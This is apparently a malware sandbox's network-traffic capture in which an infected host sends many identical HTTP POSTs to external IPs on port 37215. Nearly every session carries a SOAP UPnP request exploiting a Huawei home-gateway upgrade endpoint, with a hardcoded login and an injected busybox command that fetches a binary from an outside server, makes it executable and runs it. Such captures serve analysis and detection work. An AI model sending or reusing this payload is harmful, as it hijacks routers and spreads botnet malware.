                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1185192.168.2.155144031.112.55.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395788908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1186192.168.2.1558908181.165.43.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395817041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1187192.168.2.1554910157.203.230.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395826101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1188192.168.2.1539744180.146.223.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395842075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1189192.168.2.155522045.246.200.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395860910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1190192.168.2.1549232181.18.208.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395893097 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1191192.168.2.1560584122.81.24.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395911932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1192192.168.2.1544482190.182.19.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395922899 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1193192.168.2.153701294.31.134.537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395956039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1194192.168.2.1534178190.242.210.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.395976067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
